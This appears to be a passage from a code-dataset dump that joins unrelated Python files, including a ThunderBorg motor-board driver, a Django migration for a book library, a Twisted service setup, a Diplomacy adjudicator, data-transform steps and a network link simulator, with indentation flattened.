self._log.error(msg)
raise ThunderBorgException(msg)
def get_comms_failsafe(self):
"""
Get the failsafe state.
:rtype: Return the failsafe state.
:raises KeyboardInterrupt: Keyboard interrupt.
:raises ThunderBorgException: An error happened on a stream.
"""
try:
recv = self._read(self.COMMAND_GET_FAILSAFE, self._I2C_READ_LEN)
except KeyboardInterrupt as e: # pragma: no cover
self._log.warning("Keyboard interrupt, %s", e)
raise e
except IOError as e: # pragma: no cover
msg = "Failed reading communications failsafe state, {}".format(e)
self._log.error(msg)
raise ThunderBorgException(msg)
return False if recv[1] == self.COMMAND_VALUE_OFF else True
def _get_drive_fault(self, command):
try:
recv = self._read(command, self._I2C_READ_LEN)
except KeyboardInterrupt as e: # pragma: no cover
self._log.warning("Keyboard interrupt, %s", e)
raise e
except IOError as e: # pragma: no cover
motor = 1 if command == self.COMMAND_GET_DRIVE_A_FAULT else 2
msg = ("Failed reading the drive fault state for "
"motor {}, {}").format(motor, e)
self._log.error(msg)
raise ThunderBorgException(msg)
return False if recv[1] == self.COMMAND_VALUE_OFF else True
def get_drive_fault_one(self):
"""
Read the motor drive fault state for motor one.
.. note::
1. Faults may indicate power problems, such as under-voltage
(not enough power), and may be cleared by setting a lower
drive power.
2. If a fault is persistent (repeatably occurs when trying to
control the board) it may indicate a wiring issue such as
indicated below.
a. The supply is not powerful enough for the motors. The
board has a bare minimum requirement of 6V to operate
correctly. The recommended minimum supply of 7.2V should
be sufficient for smaller motors.
b. The + and - connections for the motor are connected to
each other.
c. Either + or - is connected to ground (GND, also known as
0V or earth).
d. Either + or - is connected to the power supply (V+,
directly to the battery or power pack).
e. One of the motors may be damaged.
3. Faults will self-clear, they do not need to be reset, however
some faults require both motors to be moving at less than
100% to clear.
4. The easiest way to run a check is to put both motors at a low
power setting that is high enough for them to rotate easily.
e.g. 30%
5. Note that the fault state may be true at power up, this is
normal and should clear when both motors have been driven.
:rtype: Return a `False` if there are no problems else a `True` if
a fault has been detected.
:raises KeyboardInterrupt: Keyboard interrupt.
:raises ThunderBorgException: An error happened on a stream.
"""
return self._get_drive_fault(self.COMMAND_GET_DRIVE_A_FAULT)
def get_drive_fault_two(self):
"""
Read the motor drive fault state for motor two.
.. note::
1. Faults may indicate power problems, such as under-voltage
(not enough power), and may be cleared by setting a lower
drive power.
2. If a fault is persistent (repeatably occurs when trying to
control the board) it may indicate a wiring issue such as
indicated below.
a. The supply is not powerful enough for the motors. The
board has a bare minimum requirement of 6V to operate
correctly. The recommended minimum supply of 7.2V should
be sufficient for smaller motors.
b. The + and - connections for the motor are connected to
each other.
c. Either + or - is connected to ground (GND, also known as
0V or earth).
d. Either + or - is connected to the power supply (V+,
directly to the battery or power pack).
e. One of the motors may be damaged.
3. Faults will self-clear, they do not need to be reset, however
some faults require both motors to be moving at less than
100% to clear.
4. The easiest way to run a check is to put both motors at a low
power setting that is high enough for them to rotate easily.
e.g. 30%
5. Note that the fault state may be true at power up, this is
normal and should clear when both motors have been driven.
:rtype: Return a `False` if there are no problems else a `True` if
a fault has been detected.
:raises KeyboardInterrupt: Keyboard interrupt.
:raises ThunderBorgException: An error happened on a stream.
"""
return self._get_drive_fault(self.COMMAND_GET_DRIVE_B_FAULT)
def get_battery_voltage(self):
"""
Read the current battery level from the main input.
:rtype: Return a voltage value based on the 3.3 V rail as a
reference.
:raises KeyboardInterrupt: Keyboard interrupt.
:raises ThunderBorgException: An error happened on a stream.
"""
try:
recv = self._read(self.COMMAND_GET_BATT_VOLT, self._I2C_READ_LEN)
except KeyboardInterrupt as e: # pragma: no cover
self._log.warning("Keyboard interrupt, %s", e)
raise e
except IOError as e: # pragma: no cover
msg = "Failed reading battery level, {}".format(e)
self._log.error(msg)
raise ThunderBorgException(msg)
raw = (recv[1] << 8) + recv[2]
level = float(raw) / self.COMMAND_ANALOG_MAX
level *= self._VOLTAGE_PIN_MAX
return level + self._VOLTAGE_PIN_CORRECTION
def set_battery_monitoring_limits(self, minimum, maximum):
"""
Set the battery monitoring limits used for setting the LED color.
.. note::
1. The colors shown, range from full red at minimum or below,
yellow half way, and full green at maximum or higher.
2. These values are stored in EEPROM and reloaded when the board
is powered.
:param minimum: Value between 0.0 and 36.3 Volts.
:type minimum: float
:param maximum: Value between 0.0 and 36.3 Volts.
:type maximum: float
:raises KeyboardInterrupt: Keyboard interrupt.
:raises ThunderBorgException: An error happened on a stream.
"""
level_min = float(minimum) / self._VOLTAGE_PIN_MAX
level_max = float(maximum) / self._VOLTAGE_PIN_MAX
level_min = max(0, min(0xFF, int(level_min * 0xFF)))
level_max = max(0, min(0xFF, int(level_max * 0xFF)))
try:
self._write(self.COMMAND_SET_BATT_LIMITS, [level_min, level_max])
except KeyboardInterrupt as e: # pragma: no cover
self._log.warning("Keyboard interrupt, %s", e)
raise e
except IOError as e: # pragma: no cover
msg = "Failed sending battery monitoring limits, {}".format(e)
self._log.error(msg)
raise ThunderBorgException(msg)
else:
time.sleep(0.2) # Wait for EEPROM write to complete
def get_battery_monitoring_limits(self):
"""
Read the current battery monitoring limits used for setting the
LED color.
.. note::
The colors shown, range from full red at minimum or below,
yellow half way, and full green at maximum or higher.
:rtype: Return a tuple of `(minimum, maximum)`. The values are
between 0.0 and 36.3 V.
:raises KeyboardInterrupt: Keyboard interrupt.
:raises ThunderBorgException: An error happened on a stream.
"""
try:
recv = self._read(self.COMMAND_GET_BATT_LIMITS, self._I2C_READ_LEN)
except KeyboardInterrupt as e: # pragma: no cover
self._log.warning("Keyboard interrupt, %s", e)
raise e
except IOError as e: # pragma: no cover
msg = "Failed reading battery monitoring limits, {}".format(e)
self._log.error(msg)
raise ThunderBorgException(msg)
level_min = float(recv[1]) / 0xFF
level_max = float(recv[2]) / 0xFF
level_min *= self._VOLTAGE_PIN_MAX
level_max *= self._VOLTAGE_PIN_MAX
return level_min, level_max
def write_external_led_word(self, b0, b1, b2, b3):
"""
Write low level serial LED 32 bit word to set multiple LED devices
like SK9822 and APA102C.
.. note::
Bytes are written MSB (Most Significant Byte) first, starting at
b0. e.g. Executing ``tb.write_external_led_word(255, 64, 1, 0)``
would send 11111111 01000000 00000001 00000000 to the LEDs.
:param b0: Byte zero
:type b0: int
:param b1: Byte one
:type b1: int
:param b2: Byte two
:type b2: int
:param b3: Byte three
:type b3: int
:raises KeyboardInterrupt: Keyboard interrupt.
:raises ThunderBorgException: An error happened on a stream.
"""
b0 = max(0, min(self._PWM_MAX, int(b0)))
b1 = max(0, min(self._PWM_MAX, int(b1)))
b2 = max(0, min(self._PWM_MAX, int(b2)))
b3 = max(0, min(self._PWM_MAX, int(b3)))
try:
self._write(self.COMMAND_WRITE_EXTERNAL_LED, [b0, b1, b2, b3])
except KeyboardInterrupt as e: # pragma: no cover
self._log.warning("Keyboard interrupt, %s", e)
raise e
except IOError as e: # pragma: no cover
msg = ("Failed sending binary word for the external LEDs, {}"
).format(e)
self._log.error(msg)
raise ThunderBorgException(msg)
def set_external_led_colors(self, colors):
"""
Takes a set of RGB values to set multiple LED devices like
SK9822 and APA102C.
.. note::
1. Each call will set all of the LEDs.
2. Executing ``tb.set_external_led_colors([[1.0, 1.0, 0.0]])``
will set a single LED to full yellow.
3. Executing ``tb.set_external_led_colors([[1.0, 0.0, 0.0], [0.5, 0.0, 0.0], [0.0, 0.0, 0.0]])`` will set LED 1 to full red, LED 2 to half red,
and LED 3 to off.
:param colors: The RGB colors for setting the LEDs.
:type colors: list
:raises KeyboardInterrupt: Keyboard interrupt.
:raises ThunderBorgException: An error happened on a stream.
"""
# Send the start marker
self.write_external_led_word(0, 0, 0, 0)
# Send each color in turn
for r, g, b in colors:
self.write_external_led_word(255, 255 * b, 255 * g, 255 * r)
|
python
|
# Generated by Django 3.2.3 on 2021-05-24 21:11
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Author',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.TextField()),
('sort', models.TextField(blank=True, null=True)),
('link', models.TextField()),
],
options={
'db_table': 'authors',
'managed': False,
},
),
migrations.CreateModel(
name='Book',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.TextField()),
('sort', models.TextField(blank=True, null=True)),
('timestamp', models.DateTimeField(blank=True, null=True)),
('pubdate', models.DateTimeField(blank=True, null=True)),
('series_index', models.FloatField()),
('author_sort', models.TextField(blank=True, null=True)),
('isbn', models.TextField(blank=True, null=True)),
('lccn', models.TextField(blank=True, null=True)),
('path', models.TextField()),
('flags', models.IntegerField()),
('uuid', models.TextField(blank=True, null=True)),
('has_cover', models.BooleanField(blank=True, null=True)),
('last_modified', models.DateTimeField()),
],
options={
'db_table': 'books',
'managed': False,
},
),
migrations.CreateModel(
name='BookAuthorLink',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
],
options={
'db_table': 'books_authors_link',
'managed': False,
},
),
migrations.CreateModel(
name='BookLanguageLink',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('item_order', models.IntegerField()),
],
options={
'db_table': 'books_languages_link',
'managed': False,
},
),
migrations.CreateModel(
name='BookPublisherLink',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
],
options={
'db_table': 'books_publishers_link',
'managed': False,
},
),
migrations.CreateModel(
name='BookRatingLink',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
],
options={
'db_table': 'books_ratings_link',
'managed': False,
},
),
migrations.CreateModel(
name='BookSeriesLink',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
],
options={
'db_table': 'books_series_link',
'managed': False,
},
),
migrations.CreateModel(
name='BookTagLink',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
],
options={
'db_table': 'books_tags_link',
'managed': False,
},
),
migrations.CreateModel(
name='Comment',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField()),
],
options={
'db_table': 'comments',
'managed': False,
},
),
migrations.CreateModel(
name='Data',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('book', models.IntegerField()),
('format', models.TextField()),
('uncompressed_size', models.IntegerField()),
('name', models.TextField()),
],
options={
'db_table': 'data',
'managed': False,
},
),
migrations.CreateModel(
name='Identifier',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('type', models.TextField()),
('val', models.TextField()),
],
options={
'db_table': 'identifiers',
'managed': False,
},
),
migrations.CreateModel(
name='Language',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('lang_code', models.TextField()),
],
options={
'db_table': 'languages',
'managed': False,
},
),
migrations.CreateModel(
name='Publisher',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.TextField()),
('sort', models.TextField(blank=True, null=True)),
],
options={
'db_table': 'publishers',
'managed': False,
},
),
migrations.CreateModel(
name='Rating',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('rating', models.IntegerField(blank=True, null=True)),
],
options={
'db_table': 'ratings',
'managed': False,
},
),
migrations.CreateModel(
name='Series',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.TextField()),
('sort', models.TextField(blank=True, null=True)),
],
options={
'db_table': 'series',
'managed': False,
},
),
migrations.CreateModel(
name='Tag',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.TextField()),
],
options={
'db_table': 'tags',
'managed': False,
},
),
]
|
python
|
#-------------------------------------------------------------------------------
# Author: Lukasz Janyst <[email protected]>
# Date: 26.11.2017
#
# Licensed under the 3-Clause BSD License, see the LICENSE file for details.
#-------------------------------------------------------------------------------
import logging
import os
from twisted.application.internet import TCPServer, SSLServer
from twisted.application.service import MultiService, IServiceMaker
from twisted.python import log, usage
from zope.interface import implementer
from twisted.web import server
from .webservice import get_web_app
from .controller import Controller
from .config import Config
from .utils import exc_repr, SSLCertOptions, decode_addresses
#-------------------------------------------------------------------------------
class ScrapyDoOptions(usage.Options):
optParameters = [
['config', 'c', '~/scrapy-do/config', 'A configuration file to load'],
]
#-------------------------------------------------------------------------------
@implementer(IServiceMaker)
class ScrapyDoServiceMaker():
tapname = "scrapy-do"
description = "A service running scrapy spiders."
options = ScrapyDoOptions
#---------------------------------------------------------------------------
def _validate_web_config(self, config):
interfaces = config.get_string('web', 'interfaces')
interfaces = decode_addresses(interfaces)
https = config.get_bool('web', 'https')
auth = config.get_bool('web', 'auth')
key_file = None
cert_file = None
chain_file = None
auth_file = None
files_to_check = []
if not interfaces:
raise ValueError('No valid web interfaces were configured')
if https:
key_file = config.get_string('web', 'key')
cert_file = config.get_string('web', 'cert')
chain_file = config.get_string('web', 'chain')
files_to_check += [key_file, cert_file]
if chain_file != '':
files_to_check.append(chain_file)
if auth:
auth_file = config.get_string('web', 'auth-db')
files_to_check.append(auth_file)
for path in files_to_check:
if not os.path.exists(path):
raise FileNotFoundError(
"No such file or directory: '{}'".format(path))
return interfaces, https, key_file, cert_file, chain_file, auth, \
auth_file
#---------------------------------------------------------------------------
def _configure_web_server(self, config, controller):
interfaces, https, key_file, cert_file, chain_file, _, _ = \
self._validate_web_config(config)
site = server.Site(get_web_app(config, controller))
web_servers = []
for interface, port in interfaces:
if https:
cf = SSLCertOptions(key_file, cert_file, chain_file)
web_server = SSLServer(port, site, cf, interface=interface)
method = 'https'
else:
web_server = TCPServer(port, site, interface=interface)
method = 'http'
web_servers.append(web_server)
if ':' in interface:
interface = '[{}]'.format(interface)
log.msg(format="Scrapy-Do web interface is available at "
"%(method)s://%(interface)s:%(port)s/",
method=method, interface=interface, port=port)
return web_servers
#---------------------------------------------------------------------------
def makeService(self, options):
top_service = MultiService()
config_file = os.path.expanduser(options['config'])
config = Config([config_file])
#-----------------------------------------------------------------------
# Set up the controller
#-----------------------------------------------------------------------
try:
controller = Controller(config)
controller.setServiceParent(top_service)
except Exception as e:
log.msg(format="Unable to set up the controller: %(reason)s",
reason=exc_repr(e), logLevel=logging.ERROR)
return top_service
#-----------------------------------------------------------------------
# Set up the web server
#-----------------------------------------------------------------------
try:
web_servers = self._configure_web_server(config, controller)
for web_server in web_servers:
web_server.setServiceParent(top_service)
except Exception as e:
log.msg(format="Scrapy-Do web interface could not have been "
"configured: %(reason)s",
reason=exc_repr(e), logLevel=logging.ERROR)
return top_service
return top_service
|
python
|
from setuptools import setup, find_packages
setup(
name='sixfab-tool',
version='0.0.3',
author='Ensar Karabudak',
author_email='[email protected]',
description='Sixfab Diagnostic Tool',
license='MIT',
url='https://github.com/sixfab/setup-and-diagnostic-tool.git',
dependency_links = [],
install_requires = [
'prompt_toolkit==1.0.14',
'pyinquirer',
'tqdm',
'yaspin',
'RPi.GPIO',
'request',
'pathlib',
'pyserial'
],
packages=find_packages()
)
|
python
|
import json
import numpy
import torch
#intrinsics_dict = None
def load_intrinsics_repository(filename, stream='Depth'):
#global intrinsics_dict
with open(filename, 'r') as json_file:
intrinsics_repository = json.load(json_file)
if (stream == 'Depth'):
intrinsics_dict = dict((intrinsics['Device'], \
intrinsics['Depth Intrinsics'][0]['1280x720'])\
for intrinsics in intrinsics_repository)
elif (stream == 'RGB'):
intrinsics_dict = dict((intrinsics['Device'], \
intrinsics['Color Intrinsics'][0]['1280x720'])\
for intrinsics in intrinsics_repository)
return intrinsics_dict
def load_rotation_translation(filename):
#global intrinsics_dict
with open(filename, 'r') as json_file:
intrinsics_repository = json.load(json_file)
intrinsics_dict = dict((intrinsics['Device'], \
{
'R' : numpy.asarray(intrinsics['Color Depth Rotation'], dtype=numpy.float32).reshape([1, 3, 3]),
't' : numpy.asarray(intrinsics['Color Depth Translation'], dtype=numpy.float32).reshape([3, 1])
})\
for intrinsics in intrinsics_repository)
return intrinsics_dict
def get_intrinsics(name, intrinsics_dict, scale=1, data_type=torch.float32):
#global intrinsics_dict
if intrinsics_dict is not None:
intrinsics_data = numpy.array(intrinsics_dict[name])
intrinsics = torch.tensor(intrinsics_data).reshape(3, 3).type(data_type)
intrinsics[0, 0] = intrinsics[0, 0] / scale
intrinsics[0, 2] = intrinsics[0, 2] / scale
intrinsics[1, 1] = intrinsics[1, 1] / scale
intrinsics[1, 2] = intrinsics[1, 2] / scale
intrinsics_inv = intrinsics.inverse()
return intrinsics, intrinsics_inv
raise ValueError("Intrinsics repository is empty")
def get_intrinsics_with_scale(intrinsics_original, scale=1, data_type=torch.float32):
intrinsics = intrinsics_original.clone().detach()
intrinsics[0, 0] = intrinsics[0, 0] / scale
intrinsics[0, 2] = intrinsics[0, 2] / scale
intrinsics[1, 1] = intrinsics[1, 1] / scale
intrinsics[1, 2] = intrinsics[1, 2] / scale
intrinsics_inv = intrinsics.inverse()
return intrinsics, intrinsics_inv
|
python
|
from adjudicator.base import Season, Phase
from adjudicator.decisions import Outcomes
from adjudicator.paradoxes import find_circular_movements
def process(state):
"""
Processes all orders in a turn.
"""
orders = state.orders
pieces = state.pieces
for order in orders:
order.check_legal()
moves = [o for o in orders if o.is_move]
retreats = [o for o in orders if o.is_retreat]
supports = [o for o in orders if o.is_support]
convoys = [o for o in orders if o.is_convoy]
builds = [o for o in orders if o.is_build]
disbands = [o for o in orders if o.is_disband]
illegal_retreats = [r for r in retreats if r.illegal]
# set illegal retreats to fail.
for r in illegal_retreats:
r.outcome = Outcomes.FAILS
illegal_moves = [m for m in moves if m.illegal]
# set illegal moves to fail.
for m in illegal_moves:
m.outcome = Outcomes.FAILS
unresolved_pieces = [p for p in pieces if p.dislodged_decision == Outcomes.UNRESOLVED]
unresolved_supports = [s for s in supports if s.outcome == Outcomes.UNRESOLVED]
unresolved_convoys = [c for c in convoys if c.piece.dislodged_decision == Outcomes.UNRESOLVED]
while unresolved_convoys:
unresolved_supports = [s for s in supports if s.outcome == Outcomes.UNRESOLVED]
unresolved_moves = [m for m in moves if m.outcome == Outcomes.UNRESOLVED]
for move in unresolved_moves:
move.resolve()
for support in unresolved_supports:
support.resolve()
for piece in unresolved_pieces:
piece.update_dislodged_decision()
for convoy in unresolved_convoys:
convoy.resolve()
# resolve fleet movements
unresolved_convoys = [c for c in convoys if c.outcome == Outcomes.UNRESOLVED]
# refresh after convoys resolved
unresolved_moves = [m for m in moves if m.outcome == Outcomes.UNRESOLVED]
depth = 0
unresolved_retreats = [r for r in retreats if r.outcome == Outcomes.UNRESOLVED]
while unresolved_moves or unresolved_pieces or unresolved_supports or unresolved_retreats:
unresolved_retreats = [r for r in retreats if r.outcome == Outcomes.UNRESOLVED]
for r in unresolved_retreats:
r.resolve()
if depth == 10:
circular_movements = find_circular_movements(moves)
for li in circular_movements:
for move in li:
move.outcome = Outcomes.SUCCEEDS
for move in [m for m in moves if m.outcome == Outcomes.UNRESOLVED]:
move.resolve()
unresolved_supports = [s for s in supports if s.outcome == Outcomes.UNRESOLVED]
for support in unresolved_supports:
support.resolve()
for piece in unresolved_pieces:
piece.update_dislodged_decision()
unresolved_moves = [m for m in moves if m.outcome == Outcomes.UNRESOLVED]
unresolved_pieces = [p for p in pieces if p.dislodged_decision == Outcomes.UNRESOLVED]
depth += 1
# Check update bounce_occurred_during_turn on all territories
for territory in state.territories:
attacks = [o for o in orders if o.is_move and o.target == territory]
bounce_occurred = False
for attack in attacks:
if attack.legal and attack.outcome == Outcomes.FAILS and \
attack.path_decision() == Outcomes.PATH:
bounce_occurred = True
territory.bounce_occurred = bounce_occurred
# Check all dislodged pieces for pieces which can't retreat
dislodged_pieces = [p for p in state.pieces
if p.dislodged_decision == Outcomes.DISLODGED]
for piece in dislodged_pieces:
if not piece.can_retreat():
piece.destroyed = True
piece.destroyed_message = (
'Destroyed because piece cannot retreat to any neighboring '
'territories.'
)
for o in [*builds, *disbands]:
if o.legal:
o.outcome = Outcomes.SUCCEEDS
else:
o.outcome = Outcomes.FAILS
if state.phase == Phase.RETREAT:
for piece in state.pieces:
if piece.retreating and (piece.order.outcome == Outcomes.FAILS):
piece.destroyed = True
piece.destroyed_message = (
'Destroyed because piece must retreat but retreat order failed.'
)
# TODO test
# TODO split into sub function
# Set captured_by for territories if fall orders
if state.season == Season.FALL and state.phase == Phase.ORDER:
# Find all pieces that are not dislodged
non_dislodged_pieces = [p for p in state.pieces if not p.dislodged]
for piece in non_dislodged_pieces:
# Ignore pieces that move successfully
if piece.order.is_move and piece.order.outcome == Outcomes.SUCCEEDS:
continue
if piece.nation != getattr(piece.territory, 'controlled_by', False):
if not (piece.territory.is_sea):
piece.territory.captured_by = piece.nation
# Find all successful move orders
successful_move_orders = [
m for m in state.orders
if m.is_move and m.outcome == Outcomes.SUCCEEDS
]
for move in successful_move_orders:
if move.piece.nation != getattr(move.target, 'controlled_by', False):
if not (move.target.is_sea):
move.target.captured_by = move.piece.nation
# Determine the next season, phase and year.
state.next_season, state.next_phase, state.next_year = \
get_next_season_phase_and_year(state)
return state
def get_next_season_phase_and_year(state):
if any(p for p in state.pieces if p.dislodged and not p.destroyed):
return state.season, Phase.RETREAT, state.year
if state.season == Season.SPRING:
return Season.FALL, Phase.ORDER, state.year
if state.season == Season.FALL and not state.phase == Phase.BUILD:
for nation in state.nations:
# TODO check for civil disorder nation
if nation.next_turn_supply_delta != 0:
return state.season, Phase.BUILD, state.year
return Season.SPRING, Phase.ORDER, state.year + 1
|
python
|
import petl
import simpleeval
from ..step import Step
from ..field import Field
class field_add(Step):
code = "field-add"
def __init__(
self,
descriptor=None,
*,
name=None,
value=None,
position=None,
incremental=False,
**options,
):
self.setinitial("name", name)
self.setinitial("value", value)
self.setinitial("position", position)
self.setinitial("incremental", incremental)
# TODO: add options
super().__init__(descriptor)
# TODO: reimplement
self.__name = name
self.__value = value
self.__position = position if not incremental else 1
self.__incremental = incremental
self.__options = options
# Transform
def transform_resource(self, source, target):
index = self.__position - 1 if self.__position else None
if self.__incremental:
target.data = source.to_petl().addrownumbers(field=self.__name)
else:
value = self.__value
if isinstance(value, str) and value.startswith("<formula>"):
formula = value.replace("<formula>", "")
value = lambda row: simpleeval.simple_eval(formula, names=row)
target.data = source.to_petl().addfield(self.__name, value=value, index=index)
field = Field(name=self.__name, **self.__options)
if index is None:
target.schema.add_field(field)
else:
target.schema.fields.insert(index, field)
# Metadata
metadata_profile = { # type: ignore
"type": "object",
"required": ["name"],
"properties": {
"name": {"type": "string"},
"value": {},
"position": {},
"incremental": {},
},
}
class field_filter(Step):
code = "field-filter"
def __init__(self, descriptor=None, *, names=None):
self.setinitial("names", names)
super().__init__(descriptor)
# TODO: reimplement
self.__names = names
# Transform
def transform_resource(self, source, target):
target.data = source.to_petl().cut(*self.__names)
for name in target.schema.field_names:
if name not in self.__names:
target.schema.remove_field(name)
# Metadata
metadata_profile = { # type: ignore
"type": "object",
"required": ["names"],
"properties": {
"names": {"type": "array"},
},
}
class field_move(Step):
code = "field-move"
def __init__(self, descriptor=None, *, name=None, position=None):
self.setinitial("name", name)
self.setinitial("position", position)
super().__init__(descriptor)
# TODO: reimplement
self.__name = name
self.__position = position
# Transform
def transform_resource(self, source, target):
target.data = source.to_petl().movefield(self.__name, self.__position - 1)
field = target.schema.remove_field(self.__name)
target.schema.fields.insert(self.__position - 1, field)
# Metadata
metadata_profile = { # type: ignore
"type": "object",
"required": ["name", "position"],
"properties": {
"name": {"type": "string"},
"position": {"type": "number"},
},
}
class field_remove(Step):
code = "field-remove"
def __init__(self, descriptor=None, *, names=None):
self.setinitial("names", names)
super().__init__(descriptor)
# TODO: reimplement
self.__names = names
# Transform
def transform_resource(self, source, target):
target.data = source.to_petl().cutout(*self.__names)
for name in self.__names:
target.schema.remove_field(name)
# Metadata
metadata_profile = { # type: ignore
"type": "object",
"required": ["names"],
"properties": {
"names": {"type": "array"},
},
}
class field_split(Step):
code = "field-split"
def __init__(
self,
descriptor=None,
*,
name=None,
to_names=None,
pattern=None,
preserve=False,
):
self.setinitial("name", name)
self.setinitial("toNames", to_names)
self.setinitial("pattern", pattern)
self.setinitial("preserve", preserve)
super().__init__(descriptor)
# TODO: reimplement
self.__name = name
self.__to_names = to_names
self.__pattern = pattern
self.__preserve = preserve
# Transform
def transform_resource(self, source, target):
processor = petl.split
# TODO: implement this check properly
if "(" in self.__pattern:
processor = petl.capture
target.data = processor(
source.to_petl(),
self.__name,
self.__pattern,
self.__to_names,
include_original=self.__preserve,
)
if not self.__preserve:
target.schema.remove_field(self.__name)
for name in self.__to_names:
field = Field(name=name, type="string")
target.schema.add_field(field)
# Metadata
metadata_profile = { # type: ignore
"type": "object",
"required": ["name", "toNames", "pattern"],
"properties": {
"name": {"type": "string"},
"toNames": {},
"pattern": {},
"preserve": {},
},
}
class field_unpack(Step):
code = "field-unpack"
def __init__(self, descriptor=None, *, name, to_names, preserve=False):
self.setinitial("name", name)
self.setinitial("toNames", to_names)
self.setinitial("preserve", preserve)
super().__init__(descriptor)
# TODO: reimplement
self.__name = name
self.__to_names = to_names
self.__preserve = preserve
# Transform
def transform_resource(self, source, target):
if target.schema.get_field(self.__name).type == "object":
target.data = source.to_petl().unpackdict(
self.__name, self.__to_names, includeoriginal=self.__preserve
)
else:
target.data = source.to_petl().unpack(
self.__name, self.__to_names, include_original=self.__preserve
)
if not self.__preserve:
target.schema.remove_field(self.__name)
for name in self.__to_names:
field = Field(name=name)
target.schema.add_field(field)
# Metadata
metadata_profile = { # type: ignore
"type": "object",
"required": ["name", "toNames"],
"properties": {
"name": {"type": "string"},
"toNames": {"type": "array"},
"preserve": {},
},
}
# TODO: accept WHERE/PREDICAT clause
class field_update(Step):
code = "field-update"
def __init__(self, descriptor=None, *, name=None, value=None, **options):
self.setinitial("name", name)
self.setinitial("value", value)
# TODO: handle options
super().__init__(descriptor)
# TODO: reimplement
self.__name = name
self.__value = value
self.__options = options
# Transform
def transform_resource(self, source, target):
value = self.__value
if isinstance(value, str) and value.startswith("<formula>"):
formula = value.replace("<formula>", "")
value = lambda val, row: simpleeval.simple_eval(formula, names=row)
if not callable(value):
target.data = source.to_petl().update(self.__name, value)
else:
target.data = source.to_petl().convert(self.__name, value)
field = target.schema.get_field(self.__name)
for name, value in self.__options.items():
setattr(field, name, value)
# Metadata
metadata_profile = { # type: ignore
"type": "object",
"required": ["name"],
"properties": {
"name": {"type": "string"},
"value": {},
},
}
|
python
|
import math
import random
from simulator.constants import BYTES_PER_PACKET
from simulator.trace import Trace
class Link():
def __init__(self, trace: Trace):
self.trace = trace
self.queue_delay = 0.0
self.queue_delay_update_time = 0.0
self.queue_size = self.trace.get_queue_size()
self.pkt_in_queue = 0
def get_cur_queue_delay(self, event_time):
# pkt_in_queue_old = max(0, self.pkt_in_queue -
# (event_time - self.queue_delay_update_time) *
# self.get_bandwidth(event_time))
self.pkt_in_queue = max(0, self.pkt_in_queue -
self.trace.get_avail_bits2send(self.queue_delay_update_time, event_time) / 8 / BYTES_PER_PACKET)
# print('old pkt_in_queue', pkt_in_queue_old, 'new pkt_in_queue', pkt_in_queue, 'pkt_in_queue before change', self.pkt_in_queue)
# self.pkt_in_queue = pkt_in_queue_old
self.queue_delay_update_time = event_time
# cur_queue_delay = math.ceil(
# self.pkt_in_queue) / self.get_bandwidth(event_time)
# cur_queue_delay_old = self.pkt_in_queue / self.get_bandwidth(event_time) # cur_queue_delay is not accurate
cur_queue_delay = self.trace.get_sending_t_usage(self.pkt_in_queue * BYTES_PER_PACKET * 8, event_time)
return cur_queue_delay
def get_cur_latency(self, event_time):
q_delay = self.get_cur_queue_delay(event_time)
# print('queue delay: ', q_delay)
return self.trace.get_delay(event_time) / 1000.0 + q_delay
def packet_enters_link(self, event_time):
if (random.random() < self.trace.get_loss_rate()):
return False
self.queue_delay = self.get_cur_queue_delay(event_time)
extra_delay = 1.0 / self.get_bandwidth(event_time)
# if 1 + math.ceil(self.pkt_in_queue) > self.queue_size:
# return False
if 1 + self.pkt_in_queue > self.queue_size:
return False
self.queue_delay += extra_delay
self.pkt_in_queue += 1
return True
def print_debug(self):
print("Link:")
print("Bandwidth: %f" % self.get_bandwidth(0))
print("Delay: %f" % self.trace.get_delay(0))
print("Queue Delay: %f" % self.queue_delay)
print("One Packet Queue Delay: %f" % (1.0 / self.get_bandwidth(0)))
print("Queue size: %d" % self.queue_size)
print("Loss: %f" % self.trace.get_loss_rate())
def reset(self):
self.queue_delay = 0.0
self.queue_delay_update_time = 0.0
self.pkt_in_queue = 0
def get_bandwidth(self, ts):
return self.trace.get_bandwidth(ts) * 1e6 / 8 / BYTES_PER_PACKET
|
python
|
import numpy as np
import torch
def covariance(m, rowvar=False):
'''Estimate a covariance matrix given data.
Covariance indicates the level to which two variables vary together.
If we examine N-dimensional samples, `X = [x_1, x_2, ... x_N]^T`,
then the covariance matrix element `C_{ij}` is the covariance of
`x_i` and `x_j`. The element `C_{ii}` is the variance of `x_i`.
Args:
m: A 1-D or 2-D array containing multiple variables and observations.
Each row of `m` represents a variable, and each column a single
observation of all those variables.
rowvar: If `rowvar` is True, then each row represents a
variable, with observations in the columns. Otherwise, the
relationship is transposed: each column represents a variable,
while the rows contain observations.
Returns:
The covariance matrix of the variables.
'''
if m.dim() > 2:
raise ValueError('m has more than 2 dimensions')
if m.dim() < 2:
m = m.view(1, -1)
if not rowvar and m.size(0) != 1:
m = m.t()
# m = m.type(torch.double) # uncomment this line if desired
fact = 1.0 / (m.size(1) - 1)
